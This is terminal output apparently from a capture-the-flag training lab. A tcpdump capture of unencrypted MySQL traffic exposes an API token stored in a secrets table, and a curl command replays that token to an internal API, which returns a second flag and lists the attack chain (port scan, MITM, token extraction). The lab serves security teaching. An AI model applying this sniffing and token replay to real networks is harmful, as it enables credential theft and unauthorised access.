.mysql: Flags [P.], seq 188:316, ack 112, win 502, options [nop,nop,TS val 317911246 ecr 3853043163], length 128
E.....@.@.C!...
.........`.e..^.....X......
........|....
            SELECT id, secret_name, secret_value, description 
            FROM secrets 
            WHERE id = 1
        
19:50:19.003535 IP ip-172-20-0-11.us-east-2.compute.internal.mysql > ip-172-20-0-10.us-east-2.compute.internal.58908: Flags [P.], seq 112:520, ack 316, win 508, options [nop,nop,TS val 3853043164 ecr 317911246], length 408
E...E@@.@..........
......^..`......Y......
..................def.userdb.secrets.secrets.id.id.?.......B...@....def.userdb.secrets.secrets.secret_name.secret_name.............B....def.userdb.secrets.secrets.secret_value.secret_value.............@....def.userdb.secrets.secrets.description.description......................}....1        api_token#FLAG{n3tw0rk_tr4ff1c_1s_n0t_s3cur3}LAPI authentication token for secret services - MITM attack will reveal this!.........
19:50:19.003703 IP ip-172-20-0-10.us-east-2.compute.internal.58908 > ip-172-20-0-11.us-east-2.compute.internal.mysql: Flags [P.], seq 316:321, ack 520, win 501, options [nop,nop,TS val 317911247 ecr 3853043164], length 5
E..9..@.@.C....
.........`....`T....Xi.....
.............
19:50:19.003746 IP ip-172-20-0-10.us-east-2.compute.internal.58908 > ip-172-20-0-11.us-east-2.compute.internal.mysql: Flags [F.], seq 321, ack 520, win 501, options [nop,nop,TS val 317911247 ecr 3853043164], length 0
E..4..@.@.C....
.........`....`T....Xd.....
........
19:50:19.003770 IP ip-172-20-0-11.us-east-2.compute.internal.mysql > ip-172-20-0-10.us-east-2.compute.internal.58908: Flags [F.], seq 520, ack 322, win 508, options [nop,nop,TS val 3853043164 ecr 317911247], length 0
E..4EA@.@..E.......
......`T.`......Xd.....
........
19:50:19.003784 IP ip-172-20-0-10.us-east-2.compute.internal.58908 > ip-172-20-0-11.us-east-2.compute.internal.mysql: Flags [.], ack 521, win 501, options [nop,nop,TS val 317911247 ecr 3853043164], length 0
E..4..@.@.C....
.........`....`U....Xd.....
........
c^C
54 packets captured
54 packets received by filter
0 packets dropped by kernel
ubuntu@ip-172-26-4-153:~$ curl -H "Authorization: Bearer FLAG{n3tw0rk_tr4ff1c_1s_n0t_s3cur3}" \
172.20.0.21:8888/flag
{"flag":"FLAG{p0rt_kn0ck1ng_4nd_h0n3yp0ts_s4v3_th3_d4y}","message":"Congratulations! You successfully chained your exploits!","next_steps":["Now implement port knocking to protect the SSH service","Deploy a honeypot using the starter template"],"steps_completed":["1. Developed a port scanner","2. Discovered this hidden API service on port 8888","3. Performed MITM attack on database traffic","4. Extracted FLAG{1} (the API token) from network packets","5. Used FLAG{1} to authenticate to this API","6. Retrieved FLAG{3}"],"success":true}
